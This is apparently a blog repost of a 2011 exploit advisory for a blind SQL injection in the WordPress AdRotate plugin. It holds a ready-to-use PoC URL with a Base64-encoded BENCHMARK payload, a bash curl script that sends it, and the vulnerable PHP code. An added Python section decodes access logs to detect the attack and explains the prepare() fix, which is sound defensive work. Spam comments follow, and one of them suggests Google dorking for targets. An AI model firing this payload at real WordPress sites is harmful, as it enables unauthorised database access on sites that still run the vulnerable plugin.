# Exploit Title: WordPress AdRotate plugin <= 3.6.6 SQL Injection Vulnerability
# Date: 2011-11-8
# Author: Miroslav Stampar (miroslav.stampar(at)gmail.com @stamparm)
# Software Link: http://downloads.wordpress.org/plugin/adrotate.3.6.6.zip
# Version: 3.6.6 (tested)
# Note: parameter $_GET["track"] has to be Base64 encoded
---
PoC
---
http://www.site.com/wp-content/plugins/adrotate/adrotate-out.php?track=MScgQU5EIDE9SUYoMj4xLEJFTkNITUFSSyg1MDAwMDAwLE1ENShDSEFSKDExNSwxMTMsMTA4LDEwOSw5NywxMTIpKSksMCkj
e.g.
#!/bin/bash
# CHAR(115,113,108,109,97,112) spells "sqlmap"; BENCHMARK() only burns CPU, so a
# noticeably delayed redirect confirms the injection without touching any data.
payload="1' AND 1=IF(2>1,BENCHMARK(5000000,MD5(CHAR(115,113,108,109,97,112))),0)#"
encoded=$(printf '%s' "$payload" | base64 -w 0)
# -G with --data-urlencode keeps any '+', '/' or '=' in the Base64 intact in the query string
curl -G --data-urlencode "track=$encoded" "http://www.site.com/wp-content/plugins/adrotate/adrotate-out.php"
---------------
Vulnerable code
---------------
if(isset($_GET['track']) OR $_GET['track'] != '') {
$meta = base64_decode($_GET['track']);
...
list($ad, $group, $block) = explode("-", $meta);
...
$bannerurl = $wpdb->get_var($wpdb->prepare("SELECT `link` FROM `".$prefix."adrotate` WHERE `id` = '".$ad."' LIMIT 1;")); //wrong (mis)usage of wpdb->prepare(): $ad is already concatenated into the query string and no placeholder or argument is passed, so prepare() escapes nothing
p.s. tried to contact author and WordPress team but without any luck
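The two facts above, a Base64-wrapped parameter and an explode("-") before the concatenation, are what the following added example turns into code. It is not part of the advisory or of the plugin: it rebuilds the track value the way the bash PoC does, refuses payloads the plugin would truncate, and runs a decode-then-match check over access-log lines to show that grepping the raw URL for quotes or BENCHMARK misses this injection. The log lines, addresses and the OUT_PATH constant are constructed for the demonstration.

```python
"""Added example (not from the advisory or the AdRotate plugin).

adrotate-out.php base64-decodes $_GET['track'], runs explode("-", ...) on the
result and concatenates the first field straight into the SQL string, so:
  * a payload must not contain '-', or explode() cuts it short, which is why
    the PoC closes the statement with '#' rather than the usual '-- ';
  * a WAF or log search that looks at the raw URL never sees quotes, IF() or
    BENCHMARK(); it has to decode the parameter first.
The access-log lines below are constructed for the demonstration.
"""
import base64
import binascii
import re
from typing import Dict, List, Optional, Tuple
from urllib.parse import parse_qs, quote, urlsplit

OUT_PATH = "/wp-content/plugins/adrotate/adrotate-out.php"

# Characters and keywords that never appear in a legitimate ad id (a small integer).
SQLI_PATTERN = re.compile(
    r"['\"()#;=]|\b(?:AND|OR|IF|BENCHMARK|SLEEP|UNION|SELECT|CHAR)\b", re.IGNORECASE
)


def build_track(payload: str) -> str:
    """Encode an injection string into the track= value, as the bash PoC does.

    The Base64 is percent-encoded so '+', '/' and '=' survive the query string.
    A '-' in the payload is rejected: the plugin's explode("-") would truncate it.
    """
    if "-" in payload:
        raise ValueError("payload must not contain '-': explode('-') truncates it")
    return quote(base64.b64encode(payload.encode()).decode(), safe="")


def decode_track(track: str) -> Optional[Tuple[str, str, str]]:
    """Mirror the plugin: base64-decode, split on '-', take (ad, group, block).

    PHP's base64_decode() tolerates missing padding, so it is restored here too.
    Returns None for values that are not Base64 at all.
    """
    track += "=" * (-len(track) % 4)
    try:
        meta = base64.b64decode(track, validate=True).decode("utf-8", "replace")
    except (binascii.Error, ValueError):
        return None
    ad, group, block = (meta.split("-") + ["", ""])[:3]
    return ad, group, block


def scan_log(lines: List[str]) -> List[Dict[str, str]]:
    """Return the requests whose decoded track id field looks like SQL.

    Each hit carries the decoded id, i.e. what the database actually received,
    rather than the opaque Base64 blob an analyst would otherwise have to decode.
    """
    hits = []
    for line in lines:
        m = re.search(r'"(?:GET|POST) (\S+) HTTP/', line)
        if not m:
            continue
        url = urlsplit(m.group(1))
        if not url.path.endswith(OUT_PATH):
            continue
        for track in parse_qs(url.query).get("track", []):
            decoded = decode_track(track)
            if decoded is not None and SQLI_PATTERN.search(decoded[0]):
                hits.append({"line": line, "ad": decoded[0]})
    return hits


# The PoC payload and its Base64 form from this advisory.
POC_PAYLOAD = "1' AND 1=IF(2>1,BENCHMARK(5000000,MD5(CHAR(115,113,108,109,97,112))),0)#"
POC_TRACK = (
    "MScgQU5EIDE9SUYoMj4xLEJFTkNITUFSSyg1MDAwMDAwLE1ENShDSEFSKDExNSwx"
    "MTMsMTA4LDEwOSw5NywxMTIpKSksMCkj"
)

# Constructed access-log lines: a normal click (track "1-2-3"), the PoC, an unrelated hit.
SAMPLE_LOG = [
    '203.0.113.7 - - [14/Nov/2011:10:02:11 +0000] "GET ' + OUT_PATH + '?track=MS0yLTM= HTTP/1.1" 302 -',
    '198.51.100.9 - - [14/Nov/2011:10:03:45 +0000] "GET ' + OUT_PATH + "?track=" + POC_TRACK + ' HTTP/1.1" 302 -',
    '203.0.113.7 - - [14/Nov/2011:10:04:01 +0000] "GET /index.php HTTP/1.1" 200 5120',
]

if __name__ == "__main__":
    assert build_track(POC_PAYLOAD) == POC_TRACK
    for hit in scan_log(SAMPLE_LOG):
        print("suspicious track id:", hit["ad"])
```

On the PHP side the fix is to let prepare() do the escaping instead of bypassing it: put a `%d` placeholder in the format string and pass `$ad` as a separate argument (`$wpdb->prepare("SELECT `link` FROM `{$prefix}adrotate` WHERE `id` = %d LIMIT 1", $ad)`), which also casts the id to an integer. Any WAF rule for this endpoint needs the same decode step as scan_log() above, otherwise the Base64 hides every metacharacter from it.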
Monday, November 14, 2011
14 comments:
Reading is my passion. Browsing through your site gives me a lot of knowledge in so many ways. Thank you for the efforts you made in writing and sharing your points of view. Looking forward to learning some more from you.
Wordpress Customization Service
Keep it up.
thanks 4 sharing this post with us
nice post i really enjoyed reading it a lot
awesome and fantastic post really like it a lot
awesome and fantastic post really like it a lot
great work done by you keep doing this type of work
good job i like it
Really amazing post...
thanks 4 sharing this post with us
Hi to all, the contents present at this web page are genuinely remarkable for people's knowledge, well, keep up the nice work fellows.
Also visit my web blog : 500 Facebook Fans
Is this vulnerability still not fixed? Google search for inurl:adrotate-out.php yields lots of targets 0.o Wordpress needs to do something about this.
Good day! This is my 1st comment here so I just wanted to give a quick shout out and say I truly enjoy reading through your posts. Can you suggest any other blogs/websites/forums that cover the same topics? Thank you so much!
My web page; bacode rental
I know this is off topic but I'm looking into starting my own blog and was wondering what all is needed to get set up? I'm assuming having a blog like yours would cost a pretty penny? I'm not very web smart so I'm not 100% sure. Any suggestions or advice would be greatly appreciated. Kudos
Here is my webpage - rent bar code scanner
My site > rent barcode scanner
To a sure extent, this fact is and what is fiction? [url=http://www.onlinecasinoburger.co.uk/]online casino uk[/url] online casino uk This city is not real $8.5; tables,$7.3, up 1 percent. http://www.onlinecasinoburger.co.uk/